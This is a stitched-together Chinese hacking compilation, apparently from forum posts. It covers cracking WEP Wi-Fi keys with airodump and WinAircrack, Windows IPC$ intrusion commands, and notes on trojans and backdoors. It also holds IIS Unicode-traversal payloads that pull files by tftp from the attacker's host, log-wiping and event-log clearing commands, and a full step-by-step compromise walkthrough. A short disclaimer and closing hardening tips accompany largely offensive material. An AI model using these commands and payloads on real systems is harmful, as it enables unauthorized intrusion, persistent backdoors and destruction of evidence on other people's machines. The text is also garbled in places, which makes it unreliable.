(2)下载无线网卡新驱动:
要想下载合适的无线网卡新驱动就需要到前面提到的那个跳转页面了。
第一步:打开的页面地址为http://www.wildpackets.com/support/proct_support/airopeek/hardware,我们通过这个地址下载适合自己网卡的可以使用airomp的驱动。
第二步:在搜索设备页面中选择自己无线网卡的品牌和型号。笔者选择tp-link的所有无线产品进行查询,看看应该下载哪个驱动
第三步:在查询结果页面中我们可以看到自己的网卡应该使用该站点提供的AR5005G驱动来使用airomp
四步:再次返回http://www.wildpackets.com/support/proct_support/airopeek/hardware页面,你会在该页内容上看到关于该驱动所兼容的atheros卡型号,里面会提到ar5005,虽然我们的是ar5005g但是可以使用。点该页面下方的the wildpackets atheros wireless driver v4.2链接进行下载即可
第五步:下载wildpackets atheros wireless driver v4.2驱动到本地硬盘。
第六步:打开后里面有三个文件,我们的无线网卡升级工作就要靠这三个文件。
(3)安装无线网卡新驱动:
之前下载的wildpackets atheros wireless driver v4.2压缩包里的三个文件就是我们安装驱动的主角。
第一步:在桌面网上邻居图标上点鼠标右键,并选择属性。
第二步:在自己的无线网卡对应的本地连接上点鼠标右键,并选择属性。
第三步:在无线网络连接属性窗口中的“常规”标签下点网卡信息旁边的“配置”按钮。
第四步:在“驱动程序”标签中点“更新驱动程序”按钮。
第五步:系统将出现硬件安装向导,我们选择“从列表或指定位置安装(高级),然后点“下一步”按钮
第六步:然后选择“不要搜索,我要自己选择要安装的驱动程序”,点“下一步”按钮继续。
七步:由于之前我们安装的驱动是*****无线网卡的官方驱动,所以系统默认会找到相应的驱动,我们不选择他们,点“从磁盘安装”。
第八步:通过“浏览”按钮找到我们下载并解压缩的wildpackets atheros wireless driver v4.2文件保存目录。
第九步:选择atheros ar5005g cardbus wireless network adapter,点“下一步”继续
第十步:在安装驱动过程中会出现兼容性提示,我们点“仍然继续”即可。
第十一步:系统复制必须文件到本地磁盘
第十二步:完成硬件更新向导,我们的TP-LINK无线网卡现在已经变成了atheros ar5005g无线网卡了,这样才能够使用airomp这个无线网络sniffer工具。
四、总 结:
由于WEP破解的准备工作比较多,已经成功的将自己的网卡进行了更新驱动工作,这也是WEP加密破解的关键,
开始 轻松破解无线网络WEP
一、使用airomp抓取无线网络数据包并破解SSID名称:
不管是找出已经禁用了SSID号广播的无线网络还是进行WEP解密工作,我们首先要做的就是通过无线网络sniffer工具——airomp来监视无线网络中的数据包。
第一步:打开文章中下载的winaircrackpack压缩包解压缩的目录。
第二步:运行airomp.exe程序,这个就是我们的sniffer小工具,他的正常运行是建立在我们无线网卡已经更新驱动的基础上。
第三步:这时你会发现显示的信息和安装驱动前已经不同了,我们的***网卡名称已经变为13 atheros ar5005g cardbus wireless network adapter,也就是说他成功更新为与atheros兼容的硬件了。我们输入其前面的数字13即可。
第四步:接下来是选择无线网卡的类型,既然说了是与atheros相兼容的,所以直接输入“a”进行选择即可。
第五步:上面文章中提到了已经把无线网络的SSID广播功能取消了,这样我们假设还不知道该无线设备使用的哪个频段和SSID号。在这里输入0,这样将检测所有频段的无线数据包。
实际上要想知道一个无线网络使用的频段是非常简单的,可以使用无线网卡管理配置工具,就像上文提到的那样,可以知道该无线网络使用的速度和频段,但是无法检测出SSID号。
第六步:同样输入一个保存数据包信息的文件,例如输入softer。这样可以把检测到的数据包以及统计信息一起写到这个文件中,并为使用其他工具提供基础保证。
第七步:是否只收集wep数据信息,我们点N”。这样将检测网络中的所有数据包不只WEP加密数据。
第八步:最后airomp会自动检测网络中的所有频段,对无线网络中的无线数据包进行统计和分析。
第九步:当统计的数据包比较多的时候,就可以自动分析出无线网络对应的SSID号和无线设备的MAC地址以及无线速度,发射频段和是否加密,采用何种方式加密了,是不是非常神气?例如设置的无线网络SSID号为softer,刚开始图7中统计时还没有检测出来,当数据达到一定数量后例如DATA处为 15651时就可以看到ESSID号即SSID号为softer了。
至此我们成功的实现了通过airomp找到没有开启SSID广播功能的无线网络对应的SSID号,所以说仅仅报着将SSID号隐藏并修改默认名字是不能阻止非法入侵者连接无线网络的。不管你是否开启SSID广播,我们都可以通过无线网络的sniffer工具来找出你的真实SSID名称。
不过有一点要特别注意,那就是是否能够破解SSID名称是建立在airomp搜集到足够的数据包基础上的,也就是说也可能你的无线路由器开着,但是没有任何无线网卡和他通讯,这样airomp是无法检测到任何无线数据包并进行分析破解的。笔者在写本文进行的实验环境也是如此,那另外一块TP-LINK无线网卡510G安装在一台联想笔记本上并不停的通过无线路由器进行BT下载来保持总是不断有无线数据传输,这样才可以加快破解进程。
另外当数据包没有收集足够多的情况下,airomp会出现错误信息,例如本来是WEP加密方式的无线网络,可能会检测为WPA。用户只需要多等些时间让airomp收集足够多的数据就可以保证显示结果的真实性了。
二、使用WinAircrack破解WEP密文:
虽然我们可以通过airomp来检测无线网络的基本信息,包括发射频段,无线网络的SSID名称,无线速度等。但是对于那些使用WEP加密了的无线网络就无能为力了,即使我们知道了无线网络的SSID号如果没有WEP加密密文的话,依然无法连接到该网络。
不过airomp收集到的信息也是非常宝贵的,我们可以通过另外一个工具来分析出WEP密文。该工具的名称是WinAircrack,当然在用 WinAircrack破解airomp收集到的信息前一定保证airomp收集的信息量要大,信息越多破解越不容易出问题,而且破解成功所需时间越短。
第一步:打开下载的压缩包,运行里面的winaircrack.exe程序。
第二步:在左边找到general,接下来点GENERAL界面中下方的click here to locate capture file...,让我们选择一个捕获文件。
第三步:这个文件就是上面所提到的airomp保存下来的数据统计文件,第九步中已经为其起了一个名字叫softer了,那么我们到airomp.exe所在文件夹中找到softer.cap文件,这个文件就是捕获文件。
第四步:回到general界面,在encryption type处选择WEP。
第五步:在左边点WEP,在WEP设置标签中先检测64位密文,key index保持自动AUTO。因为大部分用户在设置无线路由器WEP加密时都选择了最简单的64位密文,他也是破解所需时间最短的。
第六步:设置完毕点右下角的“aircrack the key...”按钮,winaircrack会自动根据softer.cap中保存的统计信息进行分析,暴力破解WEP密文。
第七步:由于采取的是暴力破解方法,所以花费的时间会比较多,大概需要几个小时甚至更多的时间来破解一个64位的WEP密文。当发现WEP密文后会显示出内容.
不过在实际操作过程中需要的时间会比较长,特别是当WEP密文设置的比较复杂时,例如使用多个数字或者增加加密位数达到128位等。
另外通过airomp来收集无线数据传输包也是关键,也许对方开着路由器但并没有和网卡进行大流量数据传输,这样即使你开启airomp收集了几个小时,都可能出现无法获得足够数据包问题。
仅仅是为了和大家交流,希望大家不要使用本文介绍的方法去入侵别人的无线网,
大家能够明白WEP加密也不是百分之百安全,所以应该尽量使用WPA安全加密方式。
--------------------------------------------------------------------------------
无线网络密码破解
面的工具可以帮助你。你有点电脑基础的话,很容易搞到密码的。
Kismet:一款超强的无线嗅探器
NetStumbler:免费的Windows 802.11嗅探器
GFI LANguard:一款Windows平台上的商业网络安全扫描器
Airsnort:802.11 WEP加密破解工具
无非是扫描 嗅探 破解
与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
(以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
(传送文件到远程主机WINNT目录下) 本机目录路径\程序 \\IP地址\admin$
(查看远程主机时间) net time \\IP地址
(定时启动某个程序) at \\IP地址 02:18 readme.exe
(查看共享) net view \\IP地址
(查看netbios工作组列表) nbtstat -A IP地址
(将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
(这两条把自己增加到管理员组): net user 用户名 密码 /add
net localgroup Administrators 用户名 /add
(断开连接) net use \\IP地址\ipc$ /delete
=====================================================
擦屁屁:
del C:\winnt\system32\logfiles\*.*
del C:\winnt\system32\config\*.evt
del C:\winnt\system32\dtclog\*.*
del C:\winnt\system32\*.log
del C:\winnt\system32\*.txt
del C:\winnt\*.txt
del C:\winnt\*.log
============================
一、netsvc.exe
下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
netsvc /list \\IP地址
netsvc schele \\IP地址 /query
netsvc \\IP地址 schele /start
二、OpenTelnet.exe
远程启动主机的Telnet服务,并绑定端口到7878,例如:
OpenTelnet \\IP地址 用户名 密码 1 7878
然后就可以telnet到主机的7878端口,进入DOS方式下:
telnet IP地址 7878
三、winshell.exe
一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
p Path (查看winshell主程序的路径信息)
b reBoot (重新启动机器)
d shutDown (关闭机器)
s Shell (执行后你就会看到可爱的“C:\>”)
x eXit (退出本次登录会话,此命令并不终止winshell的运行)
CMD> http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
四、3389登陆器,GUI方式登录远程主机的
五、elsave.exe
事件日志清除工具
elsave -s \\IP地址 -l "application" -C
elsave -s \\IP地址 -l "system" -C
elsave -s \\IP地址 -l "security" -C
执行后成功清除应用程序日志,系统日志,安全日志
六、hbulot.exe
开启win2kserver和winxp的3389服务
hbulot [/r]
使用/r表示安装完成后自动重起目标使设置生效。
七、nc.exe(netcat.exe)
一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
想要连接到某处: nc [-options] hostname port[s] [ports] ...
绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
参数:
-e prog 程序重定向,一旦连接,就执行 [危险!!]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h 帮助信息
-i secs 延时的间隔
-l 监听模式,用于入站连接
-n 指定数字的IP地址,不能用hostname
-o file 记录16进制的传输
-p port 本地端口号
-r 任意指定本地及远程端口
-s addr 本地源地址
-u UDP模式
-v 详细输出——用两个-v可得到更详细的内容
-w secs timeout的时间
-z 将输入输出关掉——用于扫描时
八、TFTPD32.EXE
把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
然后可以直接令文件运行:
http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
九、 prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用 telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp 下需要打winxp。
一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
一、一 Xscan命令行运行参数说明:
在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按""强行关闭程序。
1.命令格式: xscan -host [-] [其他选项]
xscan -file [其他选项]
其中 含义如下:
-port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
-ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
-ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
-cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
-iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
[其他选项] 含义如下:
-v: 显示详细扫描进度
-p: 跳过Ping不通的主机
-o: 跳过没有检测到开放端口的主机
-t : 指定最大并发线程数量和并发主机数量, 默认数量为100,10
采纳我吧 谢谢
10. 空连接的关于操作
首先我们来了解一些基础知识:
1 SMB:(Server Message Block) Windows 协议族,用于文件打印共享的服务;
2 NBT:(NETBios Over TCP/IP) 使用 137 ( UDP ) 138 ( UDP ) 139 ( TCP )端口实现基于 TCP/IP 协议的 NETBIOS网络互联。
3 在 WindowsNT 中 SMB 基于 NBT 实现,即使用 139 ( TCP )端口;而在 Windows2000 中, SMB 除了基于 NBT 实现,还可以直接通过 445 端口实现。
有了这些基础知识,我们就可以进一步来讨论访问网络共享对端口的选择了:
对于 win2000客户端(发起端)来说:
1 如果在允许 NBT 的情况下连接服务器时,客户端会同时尝试访问 139 和 445 端口,如果 445 端口有响应,那么就发送 RST 包给 139 端口断开连接,用 455 端口进行会话,当 445 端口无响应时,才使用 139 端口,如果两个端口都没有响应,则会话失败;
2 如果在禁止 NBT 的情况下连接服务器时,那么客户端只会尝试访问 445 端口,如果 445 端口无响应,那么会话失败。
对于 win2000 服务器端来说:
1 如果允许 NBT, 那么 UDP 端口 137, 138, TCP 端口 139, 445 将开放( LISTENING );
2 如果禁止 NBT ,那么只有 445 端口开放。
我们建立的 ipc$ 会话对端口的选择同样遵守以上原则。显而易见,如果远程服务器没有监听 139 或 445 端口, ipc$ 会话是无法建立的。 以下是一些常见的导致 ipc$ 连接失败的原因:
1 IPC 连接是 Windows NT 及以上系统中特有的功能,由于其需要用到 Windows NT 中很多 DLL 函数,所以不能在 Windows 9.x/Me 系统中运行,也就是说只有 nt/2000/xp 才可以相互建立 ipc$ 连接, 98/me 是不能建立 ipc$ 连接的;
2 如果想成功的建立一个 ipc$ 连接,就需要响应方开启 ipc$ 共享,即使是空连接也是这样,如果响应方关闭了 ipc$ 共享,将不能建立连接;
3 连接发起方未启动 Lanmanworkstation 服务(显示名为: Workstation ):它提供网络链结和通讯,没有它发起方无法发起连接请求;
4 响应方未启动 Lanmanserver 服务(显示名为: Server ):它提供了 RPC 支持、文件、打印以及命名管道共享, ipc$ 依赖于此服务,没有它主机将无法响应发起方的连接请求,不过没有它仍可发起 ipc$ 连接;
5 响应方未启动 NetLogon ,它支持网络上计算机 pass-through 帐户登录身份(不过这种情况好像不多);
6 响应方的 139 , 445 端口未处于监听状态或被防火墙屏蔽;
7 连接发起方未打开 139 , 445 端口;
8 用户名或者密码错误:如果发生这样的错误,系统将给你类似于 ' 无法更新密码 ' 这样的错误提示(显然空会话排除这种错误);
9 命令输入错误:可能多了或少了空格,当用户名和密码中不包含空格时两边的双引号可以省略,如果密码为空,可以直接输入两个引号 即可;
10 如果在已经建立好连接的情况下对方重启计算机,那么 ipc$ 连接将会自动断开,需要重新建立连接。
另外 , 你也可以根据返回的错误号分析原因:
错误号 5 ,拒绝访问:很可能你使用的用户不是管理员权限的;
错误号 51 , Windows 无法找到网络路径:网络有问题;
错误号 53 ,找不到网络路径: ip 地址错误;目标未开机;目标 lanmanserver 服务未启动;目标有防火墙(端口过滤);
错误号 67 ,找不到网络名:你的 lanmanworkstation 服务未启动或者目标删除了 ipc$ ;
错误号 1219 ,提供的凭据与已存在的凭据集冲突:你已经和对方建立了一个 ipc$ ,请删除再连;
错误号 1326 ,未知的用户名或错误密码:原因很明显了;
错误号 1792 ,试图登录,但是网络登录服务没有启动:目标 NetLogon 服务未启动;
错误号 2242 ,此用户的密码已经过期:目标有帐号策略,强制定期要求更改密码。 有些朋友虽然成功的建立了 ipc$ 连接,但在 时却遇到了这样那样的麻烦,无法复制成功,那么导致复制失败的常见原因又有哪些呢?
1. 对方未开启共享文件夹
这类错误出现的最多,占到 50% 以上。许多朋友在 ipc$ 连接建立成功后,甚至都不知道对方是否有共享文件夹,就进行盲目复制,结果导致复制失败而且郁闷的很。因此我建议大家在进行复制之前务必用 net view\IP这个命令看一下你想要复制的共享文件夹是否存在(用软件查看当然更好),不要认为能建立 ipc$ 连接就一定有共享文件夹存在。
2. 向默认共享复制失败
这类错误也是大家经常犯的,主要有两个小方面:
1)错误的认为能建立 ipc$ 连接的主机就一定开启了默认共享,因而在建立完连接之后马上向 c$,d$,admin$ 之类的默认共享复制文件,一旦对方未开启默认共享,将导致复制失败。 ipc$ 连接成功只能说明对方打开了 ipc$ 共享,并不能说明默认共享一定存在。 ipc$ 共享与默认共享是 两码 事, ipc$ 共享是一个命名管道,并不是哪个实际的文件夹,而默认共享却是实实在在的共享文件夹;
2)由于 net view\IP这个命令无法显示默认共享文件夹(因为默认共享带 $ ),因此通过这个命令,我们并不能判断对方是否开启了默认共享,因此如果对方未开启默认共享,那么所有向默认共享进行的操作都不能成功;(不过大部分扫描软件在扫弱口令的同时,都能扫到默认共享目录,可以避免此类错误的发生)
要点:请大家一定区分 ipc 共享,默认共享,普通共享这三者的区别: ipc 共享是一个管道,并不是实际的共享文件夹;默认共享是安装时默认打开的文件夹;普通共享是我们自己开启的可以设置权限的共享文件夹。
3. 用户权限不够,包括四种情形:
1 )空连接向所有共享(默认共享和普通共享)复制时,权限是不够的;
2 )向默认共享复制时,在 Win2000 Pro 版中,只有 Administrators 和 Backup Operators 组成员才可以,在 Win2000 Server 版本 Server Operatros 组也可以访问到这些共享目录;
3 )向普通共享复制时,要具有相应权限(即对方管理员事先设定的访问权限);
4 )对方可以通过防火墙或安全软件的设置,禁止外部访问共享;
注意:
A. 不要认为 administrator 就一定具有管理员权限,管理员名称是可以改的
B. 管理员可以访问默认共享的文件夹,但不一定能够访问普通的共享文件夹,因为管理员可以对普通的共享文件夹进行访问权限设置,管理员为 D 盘设置的访问权限为仅允许名为 xinxin 的用户对该文件夹进行完全访问,那么此时即使你拥有管理员权限,你仍然不能访问 D 盘。不过有意思的是,如果此时对方又开启了 D$ 的默认共享,那么你却可以访问 D$ ,从而绕过了权限限制,有兴趣的朋友可以自己做测试。
4. 被防火墙杀死或在局域网
还有一种情况,那就是也许你的复制操作已经成功,但当远程运行时,被防火墙杀掉了,导致找不到文件;或者你把木马复制到了局域网内的主机,导致连接失败(反向连接的木马不会发生这种情况)。如果你没有想到这种情况,你会以为是复制上出了问题,但实际你的复制操作已经成功了,只是运行时出了问题。 本来还想说一下用 at 远程运行程序失败的原因,但考虑到 at 的成功率不是很高,问题也很多,在这里就不提它了(提的越多,用的人就越多),而是推荐大家用 psexec.exe 远程运行程序,假设想要远程机器执行本地 c: xin.exe 文件,且管理员为 administrator ,密码为 1234 ,那么输入下面的命令:
psexec\ip-u administrator -p 1234 -c c: xin.exe
如果已经建立 ipc 连接,则 -u -p 这两个参数不需要, psexec.exe 将自动拷贝文件到远程机器并运行。
本来 xp 中的 ipc$ 也不想在这里讨论,想单独拿出来讨论,但看到越来越多的朋友很急切的提问为什么遇到 xp 的时候,大部分操作都很难成功。我在这里就简单提一下吧,在 xp 的默认安全选项中,任何远程访问仅被赋予来宾权限,也就是说即使你是用管理员帐户和密码,你所得到的权限也只是 Guest ,因此大部分操作都会因为权限不够而失败,而且到目前为止并没有一个好的办法来突破这一限制。所以如果你真的得到了 xp 的管理员密码,我建议你尽量避开 ipc 管道。 目标的 ipc$ 不是轻易就能打开的,否则就要天下打乱了。你需要一个 admin 权限的 shell ,比如 telnet ,木马, cmd 重定向等,然后在 shell 下执行:
net share ipc$
开放目标的 ipc$ 共享;
net share ipc$ /del
关闭目标的 ipc$ 共享;如果你要给它开共享文件夹,你可以用:
net share xinxin=c:
这样就把它的 c 盘开为共享名为 xinxin共享文件夹了。(可是我发现很多人错误的认为开共享文件夹的命令是 net share c$ ,还大模大样的给菜鸟指指点点,真是误人子弟了)。再次声明,这些操作都是在 shell 下才能实现的。 看到很多教程这方面写的十分不准确,一些需要 shell 才能完成命令就简简单单的在 ipc$ 连接下执行了,起了误导作用。那么下面我总结一下需要在 shell 才能完成的命令:
1 向远程主机建立用户,激活用户,修改用户密码,加入管理组的操作需要在 shell 下完成;
2 打开远程主机的 ipc$ 共享,默认共享,普通共享的操作需要在 shell 下完成;
3 运行 / 关闭远程主机的服务,需要在 shell 下完成;
4 启动 / 杀掉远程主机的进程,也需要在 shell 下完成(用软件的情况下除外,如 pskill )。
入侵中可能会用到的命令
为了这份教程的完整性,我列出了 ipc$ 入侵中的一些常用命令,如果你已经掌握了这些命令,你可以跳过这一部分看下面的内容。请注意这些命令是适用于本地还是远程,如果只适用于本地,你只能在获得远程主机的 shell (如 cmd , telnet 等)后,才能向远程主机执行。
1 建立 / 删除 ipc$ 连接的命令
1 )建立空连接 :
net use\127.0.0.1ipc$ /user:
2 )建立非空连接 :
net use\127.0.0.1ipc$ 密码 /user: 用户名
3 )删除连接 :
net use\127.0.0.1ipc$/del
2 在 ipc$ 连接中对远程主机的操作命令
1 ) 查看远程主机的共享资源(看不到默认共享) :
net view\127.0.0.1
2 ) 查看远程主机的当前时间 :
net time\127.0.0.1
3 ) 得到远程主机的 netbios 用户名列表 :
nbtstat -A 127.0.0.1
4 )映射 / 删除远程共享 :
net use z:\127.0.0.1c
此命令将共享名为 c 的共享资源映射为本地 z 盘
net use z: /del
删除映射的 z 盘,其他盘类推
5 )向远程主机复制文件 :
路径 文件名\IP共享目录名,如:
c: xin.exe\127.0.0.1c$即将 c 盘下的 xinxin.exe 复制到对方 c 盘内
当然,你也可以把远程主机上的文件复制到自己的机器里:
\127.0.0.1c$ xin.exec:
6 )远程添加计划任务 :
at\IP时间 程序名 如:
at\127.0.0.011:00 xinxin.exe
注意:时间尽量使用 24 小时制;如果你打算运行的程序在系统默认搜索路径(比如 system32/ )下则不用加路径,否则必须加全路径
3 本地命令
1 )查看本地主机的共享资源(可以看到本地的默认共享)
net share
2 )得到本地主机的用户列表
net user
3 )显示本地某用户的帐户信息
net user帐户名
4 )显示本地主机当前启动的服务
net start
5 )启动 / 关闭本地服务
net start 服务名
net stop 服务名
6 )在本地添加帐户
net user帐户名密码 /add
7 )激活禁用的用户
net uesr帐户名/active:yes
8 )加入管理员组
net localgroup administrators帐户名/add
很显然的是,虽然这些都是本地命令,但如果你在远程主机的 shell 中输入,比如你 telnet 成功后输入上面这些命令,那么这些本地输入将作用在远程主机上。
4 其他一些命令
1 ) telnet
telnet IP 端口
telnet 127.0.0.0 23
2 )用 opentelnet.exe 开启远程主机的 telnet
OpenTelnet.exe\ip管理员帐号 密码 NTLM 的认证方式 port
OpenTelnet.exe\127.0.0.1administrator 1 90
不过这个小工具需要满足四个要求:
1 )目标开启了 ipc$ 共享
2 )你要拥有管理员密码和帐号
3 )目标开启 RemoteRegistry 服务,用户就可以更改 ntlm 认证
4 )对仅 WIN2K/XP 有效
3 )用 psexec.exe 一步获得 shell ,需要 ipc 管道支持
psexec.exe\IP-u 管理员帐号 -p 密码 cmd
psexec.exe\127.0.0.1-u administrator -p cmd
对比过去和现今的 ipc$ 入侵
既然是对比,那么我就先把过去的 ipc$ 入侵步骤写给大家,都是蛮经典的步骤:
[1]
C:>net use\127.0.0.1ipc$ /user:admintitrators
\ 用扫到的空口令建立连接
[2]
c:>net view\127.0.0.1
\ 查看远程的共享资源
[3]
C:> srv.exe\127.0.0.1admin$system32
\ 将一次性后门 srv.exe 复制到对方的系统文件夹下,前提是 admin$ 开启
[4]
C:>net time\127.0.0.1
\ 查看远程主机的当前时间
[5]
C:>at\127.0.0.1时间 srv.exe
\ 用 at 命令远程运行 srv.exe ,需要对方开启了 'Task Scheler' 服务
[6]
C:>net time\127.0.0.1
\ 再次查看当前时间来估算 srv.exe 是否已经运行,此步可以省略
[7]
C:>telnet 127.0.0.1 99
\ 开一个新窗口,用 telnet远程登陆到 127.0.0.1 从而获得一个 shell( 不懂 shell 是什么意思?那你就把它想象成远程机器的控制权就好了,操作像 DOS) , 99 端口是 srv.exe 开的一次性后门的端口
[8]
C:WINNTsystem32>net start telnet
\ 我们在刚刚登陆上的 shell 中启动远程机器的 telnet 服务,毕竟 srv.exe 是一次性的后门,我们需要一个长久的后门便于以后访问,如果对方的 telnet 已经启动,此步可省略
[9]
C:> ntlm.exe\127.0.0.1admin$system32
\ 在原来那个窗口中将 ntlm.exe 传过去, ntlm.exe 是用来更改 telnet身份验证的
[10]
C:WINNTsystem32>ntlm.exe
\ 在 shell 窗口中运行 ntlm.exe ,以后你就可以畅通无阻的 telnet 这台主机了
[11]
C:>telnet 127.0.0.1 23
\ 在新窗口中 telnet 到 127.0.0.1 ,端口 23 可省略,这样我们又获得一个长期的后门
[12]
C:WINNTsystem32>net user 帐户名 密码 /add
C:WINNTsystem32>net uesr guest /active:yes
C:WINNTsystem32>net localgroup administrators 帐户名 /add
\telnet上以后,你可以建立新帐户,激活 guest ,把任何帐户加入管理员组等
好了,写到这里我似乎回到了 2 , 3 年前,那时的 ipc$ 大家都是这么用的,不过随着新工具的出现,上面提到的一些工具和命令已经不常用到了,那就让我们看看高效而简单的 ipc$ 入侵吧。
[1] psexec.exe\IP-u 管理员帐号 -p 密码 cmd
\ 用这个工具我们可以一步到位的获得 shell
OpenTelnet.exe\server管理员帐号 密码 NTLM 的认证方式 port
\ 用它可以方便的更改 telnet 的验证方式和端口,方便我们登陆
[2] 已经没有第二步了,用一步获得 shell 之后,你做什么都可以了,安后门可以用 winshell ,克隆就用 ca 吧,开终端用 3389.vbe ,记录密码用 win2kpass ,总之好的工具不少,随你选了,我就不多说了。 1 禁止空连接进行枚举 ( 此操作并不能阻止空连接的建立 )
运行 regedit ,找到如下主键 [HKEY_LOCAL_] 把 RestrictAnonymous = DWORD 的键值改为: 1
如果设置为 1 ,一个匿名用户仍然可以连接到 IPC$ 共享,但无法通过这种连接得到列举 SAM 帐号和共享信息的权限;在 Windows 2000 中增加了 2 ,未取得匿名权的用户将不能进行 ipc$ 空连接。建议设置为 1 。如果上面所说的主键不存在,就新建一个再改键值。如果你觉得改注册表麻烦,可以在本地安全设置中设置此项: 在本地安全设置-本地策略-安全选项- ' 对匿名连接的额外限制 '
2 禁止默认共享
1 )察看本地共享资源
运行 -cmd- 输入 net share
2 )删除共享(重起后默认共享仍然存在)
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete (如果有 e,f, ……可以继续删除)
3 )停止 server 服务
net stop server /y (重新启动后 server 服务会重新开启)
4 )禁止自动打开默认共享(此操作并不能关闭 ipc$ 共享)
运行 -regedit
server 版与pro 版 : 找到如下主键 [HKEY_LOCAL_] 把 AutoShareServer ( DWORD )的键值改为 :00000000 。
这两个键值在默认情况下在主机上是不存在的,需要自己手动添加,修改后重起机器使设置生效。
3 关闭 ipc$ 和默认共享依赖的服务 :server 服务
如果你真的想关闭 ipc$ 共享,那就禁止 server 服务吧:
控制面板- 管理工具 - 服务 - 找到 server 服务(右击) - 属性 - 常规 - 启动类型 - 选已禁用,这时可能会有提示说: XXX 服务也会关闭是否继续,因为还有些次要的服务要依赖于 server 服务,不要管它。
4 屏蔽 139 , 445 端口
由于没有以上两个端口的支持,是无法建立 ipc$ 的,因此屏蔽 139 , 445 端口同样可以阻止 ipc$ 入侵。
1 ) 139 端口可以通过禁止 NBT 来屏蔽
本地连接- TCP/IT 属性-高级- WINS -选‘禁用 TCP/IT 上的 NETBIOS '一项
2 ) 445 端口可以通过修改注册表来屏蔽
添加一个键值
Hive: HKEY_LOCAL_MACHINE
Key:
Name: SMBDeviceEnabled
Type: REG_DWORD
value: 0
修改完后重启机器
注意:如果屏蔽掉了以上两个端口,你将无法用 ipc$ 入侵别人。
3 )安装防火墙进行端口过滤
6 设置复杂密码,防止通过 ipc$ 穷举出密码,我觉得这才是最好的办法,增强安全意识,比不停的打补丁要安全的多。